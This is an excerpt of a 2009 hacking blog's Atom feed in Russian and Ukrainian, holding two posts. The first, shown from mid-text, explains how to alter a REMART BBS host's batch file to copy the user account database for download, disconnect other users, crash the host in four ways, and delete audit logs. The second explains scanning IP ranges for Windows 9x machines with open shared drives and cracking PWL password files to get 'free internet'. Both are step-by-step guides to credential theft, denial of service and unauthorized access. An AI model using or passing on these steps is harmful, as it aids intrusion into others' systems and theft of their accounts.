командой:&lt;br /&gt;type cleanup.bat&lt;br /&gt;и запомните его содержимое. Теперь сделайте:&lt;br /&gt;del cleanup.bat&lt;br /&gt;если у вас на это есть соответствующие права - и заново его наберите:&lt;br /&gt;type cleanup.bat&lt;br /&gt;Наберите строки, которые ранее там были; в конец (или начало) этого файла вставьте строку вида:&lt;br /&gt;сору С:PFMART.40DATUSRACC.DAT С:&lt;br /&gt;Вместо remart.40 вставьте имя соответствующей директории, подправьте имена дисков, чтобы можно было найти файл, и чтобы его копию можно было впоследствии слить.&lt;br /&gt;5. Теперь самое время перезапустить РЕМАРТ. Узнайте, кто работает в системе, и, если это левые юзера, ненавязчиво отключите их. Лучше всего это сделать командой hangup, поскольку если юзер видит у себя "ноу карриер", он списывает это на недостатки нашей с вами связи, а если РЕМАРТ ему выдаст что-то типа "Сейчас будет вежливый останов системы", он может призадуматься.&lt;br /&gt;После того, как в системе не останется юзеров (делать это надо быстро), запустите перегенерацию командой cleanup из функций администратора и закончите свой сеанс.&lt;br /&gt;6. РЕМАРТ выйдет, пакетник remart.bat запустит соответствующие проги, cleanup.bat (если Вы ничего не перепутали) и запустит опять Ремарт.&lt;br /&gt;Ну а вы в то время должны терпеливо звонить и ждать. Желательно войти в систему первым (на всякий случай).&lt;br /&gt;7. Теперь очень просто. Оттуда, куда вы указали копирование usracc.dat, даунлоадните его, удалите командой del (не со своего винта!..) и бегите опять в каталог Ремарта. Там восстановите cleanup.bat.&lt;br /&gt;8. Напоследок грохните созданный вами раздел командой:&lt;br /&gt;rl имя_раздела&lt;br /&gt;9. Можно грохнуть и аудит-файл...&lt;br /&gt;Получение полномочий администратора.&lt;br /&gt;Чтобы получить права администратора, имеется очень старый и древний способ.&lt;br /&gt;Договариваетесь со своим другом о том, что в одну и ту же секунду (!) вместе лезете на один и тот же хост. И оба вводите admin/admin, одному из вас система скажет, что пароль не верный, другой зайдет в систему под admin'oM. Главное все это делать одновременно.&lt;br /&gt;Как повесить хост РЕМАРТА.&lt;br /&gt;Повесить хост можно одним из следующих способов:&lt;br /&gt;Способ 1.&lt;br /&gt;Зайдите на какой-нибудь хост. На вопрос системы: "Display ANSI Graphics ([Y]/N)? &gt;", введите "@". На некоторых хостах сразу же вешается. На некоторых появляется две строки:&lt;br /&gt;Login:&lt;br /&gt;Password:&lt;br /&gt;Теперь резко начинайте вводить всякую лабуду, не забывая жать Enter. Через некоторое время (10-20 сек.) хост повиснет.&lt;br /&gt;Надо заметить, что на многих хостах этот метод не проходит, ввиду самодеятельности админа. То есть, обычно для устранения этой "дыры", символ "@" заменяют каким-нибудь другим. Так же нужно помнить, что хост будет висеть не долго (5-6 мин.).&lt;br /&gt;Способ 2.&lt;br /&gt;Зайдите на какой-нибудь хост. Залогиньтесь под любым существующим логином. Введите "/е" (Редактор команд), и начинайте вводить лабуду, в данном способе Enter жать не надо! Вскоре после заполнения строки, курсор сам перейдет на следующую, повторите это три раза (заполните три строки). После заполнения третьей строки хост повиснет. Для использования этого приема нужна тренировка, так что не огорчайтесь, если сначала у вас не будет ничего получаться. Самый лучший вариант, это поставить у себя Ремарт и потренироваться.&lt;br /&gt;Способ 3.&lt;br /&gt;Зайдите на какой-нибудь хост. Залогиньтесь под логином, имеющем доступ к меню регистрации. Зайдите в меню регистрации и введите левую команду (например, dir). Ремарт виснет.&lt;br /&gt;Способ 4.&lt;br /&gt;Зайдите на какой-нибудь хост. Залогиньтесь под любым существующим логином. Позовите какого-нибудь абонента на чат: "/с " и быстро "бегите" - "GO EMAIL". Если на вас попадут в момент перехода, то хост повиснет.&lt;br /&gt;Способ очень "дубовый", п&lt;br /&gt;&lt;a href="http://hackerzonn.blogspot.com/"&gt;&lt;br /&gt;Хакурство&lt;/a&gt; &lt;a href="http://hackerzonn.blogspot.com/"&gt;книги&lt;/a&gt; &lt;a href="http://hackerzonn.blogspot.com/"&gt;хакерства&lt;/a&gt; &lt;a href="http://hackerzonn.blogspot.com/"&gt;як&lt;/a&gt; &lt;a href="http://hackerzonn.blogspot.com/"&gt;стать&lt;/a&gt; &lt;a href="http://hackerzonn.blogspot.com/"&gt;хакером&lt;/a&gt; &lt;a href="http://hackerzonn.blogspot.com/"&gt;взлом&lt;/a&gt; &lt;a href="http://hackerzonn.blogspot.com/"&gt;почти&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-990699839790523839?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/990699839790523839/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=990699839790523839' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/990699839790523839'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/990699839790523839'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_8206.html' title='А ти записався в хакери?'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-206805409122656078</id><published>2009-02-01T23:42:00.002-08:00</published><updated>2009-02-01T23:44:28.880-08:00</updated><title type='text'>Халявний инет для новачків</title><content type='html'>Прив народ мене часто запитують як дізнатися пароль і як добути инета, меня ето для тех кто хочет поиметь инета! Етап 1. ДЛЯ початку треба завантажити прогу PWLhack, власне це переборщік для PWL файлів для вінди9Х, або PWLTool (RePWL) вот с ней и будем работать.&lt;br /&gt;Далі варто вибрати подходяшій сканер, у нашому випадку візьмемо Essential Net Tools.&lt;br /&gt;і фар манаджер думаю обьяснять, что ето не треба:).&lt;br /&gt;Етап 2.&lt;br /&gt;НЕ будемо чекати відразу всі застосовані на практиці.&lt;br /&gt;Запустіть програму Essential Net Tools. У лівій колонці, натискаєте на NBScan&lt;br /&gt;У нижньому віконці, де написано Starting IP address:, введіть початковий IP.&lt;br /&gt;У нашому випадку це 212.38.112.1 Автоматично заповниться нижнє віконце - Ending IP address. І натискаєте на кнопку Start.&lt;br /&gt;Програма почне сканувати всі підключені до цього діапазону в даний час комп'ютери. Після закінчення сканування дивіться на результати. У колонці RS є написи YES і NO. Відразу ж приберіть погляди з NO. І можете не звертати на них уваги. Нам потрібні тільки YES. Але й це ще не все.&lt;br /&gt;&lt;br /&gt;У самій останній колонці, де написано MAC Address, видно багато ціфр.Опять ж, приберіть погляди з чисел, що починаються на 00: Це системи Windows 2000, Unux та інші. З них ви все одно нічого не отримаєте.&lt;br /&gt;Нам потрібні OS - Windows 95, 98, Me.&lt;br /&gt;Цифри типу 44:45:53:54: ... це і є потрібні нам системи. В них то ми і будемо шукати расшаренниЙ диск С. Обравши першу жертву, наприклад&lt;br /&gt;&lt;br /&gt;Lamos microsoft YES&lt;br /&gt;213.45.67.2 44:45:53:54:00:00&lt;br /&gt;&lt;br /&gt;Тикаємо на нього правою кнопкою мишки і натискаєте Open Computer Система при цьому може на 2-3 хвилини загальмувати
